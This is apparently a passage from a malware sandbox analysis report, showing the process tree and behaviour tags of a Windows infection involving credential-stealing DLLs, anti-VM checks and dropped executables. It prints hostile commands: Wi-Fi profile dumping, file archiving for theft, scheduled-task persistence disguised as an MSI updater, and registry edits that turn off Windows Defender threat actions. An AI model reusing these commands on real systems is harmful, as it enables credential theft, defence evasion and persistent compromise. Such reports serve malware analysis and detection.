                                                            • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
                                                              5⤵
                                                                PID:5332
                                                              • C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"
                                                                5⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Drops file in Windows directory
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:6276
                                                                • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                                                  6⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:2456
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                    7⤵
                                                                    • Loads dropped DLL
                                                                    PID:5460
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                      8⤵
                                                                      • Blocklisted process makes network request
                                                                      • Loads dropped DLL
                                                                      PID:5488
                                                                      • C:\Windows\system32\netsh.exe
                                                                        netsh wlan show profiles
                                                                        9⤵
                                                                          PID:1008
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\720366693769_Desktop.zip' -CompressionLevel Optimal
                                                                          9⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          PID:1180
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                                                      7⤵
                                                                      • Blocklisted process makes network request
                                                                      • Loads dropped DLL
                                                                      PID:6600
                                                                • C:\Users\Admin\AppData\Local\Temp\1000020001\0befa0bcc7.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1000020001\0befa0bcc7.exe"
                                                                  5⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Checks whether UAC is enabled
                                                                  PID:4672
                                                                • C:\Users\Admin\1000021002\f7da420337.exe
                                                                  "C:\Users\Admin\1000021002\f7da420337.exe"
                                                                  5⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  • Suspicious use of SendNotifyMessage
                                                                  PID:6956
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                                                    6⤵
                                                                    • Drops file in Program Files directory
                                                                    PID:6440
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe5fb9cc40,0x7ffe5fb9cc4c,0x7ffe5fb9cc58
                                                                      7⤵
                                                                        PID:6588
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da HR" /sc HOURLY /rl HIGHEST
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:4360
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da LG" /sc ONLOGON /rl HIGHEST
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:4628
                                                              • C:\Users\Admin\AppData\Local\Temp\spanSuwZkaeFyeun\6wbSPhvgKkCnr8XAmJUX.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\spanSuwZkaeFyeun\6wbSPhvgKkCnr8XAmJUX.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of FindShellTrayWindow
                                                                • Suspicious use of SendNotifyMessage
                                                                PID:704
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
                                                                  4⤵
                                                                    PID:2484
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe634746f8,0x7ffe63474708,0x7ffe63474718
                                                                      5⤵
                                                                        PID:804
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,12600105987800960233,17459360173126500833,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
                                                                        5⤵
                                                                          PID:5684
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,12600105987800960233,17459360173126500833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
                                                                          5⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:5696
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
                                                                        4⤵
                                                                          PID:2472
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x80,0x108,0x7ffe634746f8,0x7ffe63474708,0x7ffe63474718
                                                                            5⤵
                                                                              PID:3952
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4306063837110901017,5512251621017414283,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
                                                                              5⤵
                                                                                PID:5644
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,4306063837110901017,5512251621017414283,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
                                                                                5⤵
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:5652
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
                                                                              4⤵
                                                                              • Enumerates system info in registry
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              • Suspicious use of SendNotifyMessage
                                                                              PID:1004
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe634746f8,0x7ffe63474708,0x7ffe63474718
                                                                                5⤵
                                                                                  PID:4932
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:2
                                                                                  5⤵
                                                                                    PID:5660
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
                                                                                    5⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:5668
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2600 /prefetch:8
                                                                                    5⤵
                                                                                      PID:5744
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                                                                                      5⤵
                                                                                        PID:5132
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
                                                                                        5⤵
                                                                                          PID:5304
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1
                                                                                          5⤵
                                                                                            PID:1772
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:1
                                                                                            5⤵
                                                                                              PID:6116
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
                                                                                              5⤵
                                                                                                PID:6348
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
                                                                                                5⤵
                                                                                                  PID:6384
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2516 /prefetch:2
                                                                                                  5⤵
                                                                                                    PID:6816
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 /prefetch:8
                                                                                                    5⤵
                                                                                                      PID:4320
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 /prefetch:8
                                                                                                      5⤵
                                                                                                        PID:4400
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_90631568f4eda919856d13dba2bc5770\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_90631568f4eda919856d13dba2bc5770 HR" /sc HOURLY /rl HIGHEST
                                                                                                    3⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:4664
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_90631568f4eda919856d13dba2bc5770\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_90631568f4eda919856d13dba2bc5770 LG" /sc ONLOGON /rl HIGHEST
                                                                                                    3⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:4524
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\spanSuwZkaeFyeun\78YNmFGpHqyB8VHcAL5S.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\spanSuwZkaeFyeun\78YNmFGpHqyB8VHcAL5S.exe"
                                                                                                    3⤵
                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks whether UAC is enabled
                                                                                                    PID:704
                                                                                                • C:\Users\Admin\Documents\SimpleAdobe\TBRWJhIKnh2MD8sNTiD1rDIz.exe
                                                                                                  C:\Users\Admin\Documents\SimpleAdobe\TBRWJhIKnh2MD8sNTiD1rDIz.exe
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3544
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                1⤵
                                                                                                  PID:4548
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                  1⤵
                                                                                                    PID:4204
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 408 -ip 408
                                                                                                    1⤵
                                                                                                      PID:3324
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                      1⤵
                                                                                                        PID:624
                                                                                                      • C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe
                                                                                                        C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:804
                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                          2⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4272
                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                          2⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2576
                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                          2⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:1224
                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                          2⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2556
                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                          C:\Windows\system32\conhost.exe
                                                                                                          2⤵
                                                                                                            PID:3392
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            svchost.exe
                                                                                                            2⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4108
                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:6136
                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:5904
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCE5C.tmp\Install.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zSCE5C.tmp\Install.exe LY /nlfdidcOwS 525403 /S
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:6924
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                2⤵
                                                                                                                  PID:4524
                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                    3⤵
                                                                                                                      PID:7044
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                        4⤵
                                                                                                                          PID:7136
                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                            5⤵
                                                                                                                              PID:6504
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                          3⤵
                                                                                                                            PID:3776
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                              4⤵
                                                                                                                                PID:6136
                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                  5⤵
                                                                                                                                    PID:7072
                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                3⤵
                                                                                                                                  PID:5184
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                    4⤵
                                                                                                                                      PID:928
                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                        5⤵
                                                                                                                                          PID:5916
                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                      3⤵
                                                                                                                                        PID:1488
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                          4⤵
                                                                                                                                            PID:7124
                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                              5⤵
                                                                                                                                                PID:6416
                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                            3⤵
                                                                                                                                              PID:6448
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                4⤵
                                                                                                                                                  PID:6460
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                    5⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:6480
                                                                                                                                                    • C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                                      "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6480" "2388" "2356" "2396" "0" "0" "2400" "0" "0" "0" "0" "0"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:3980
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 580
                                                                                                                                                2⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:5700
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                              1⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:6936
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                              1⤵
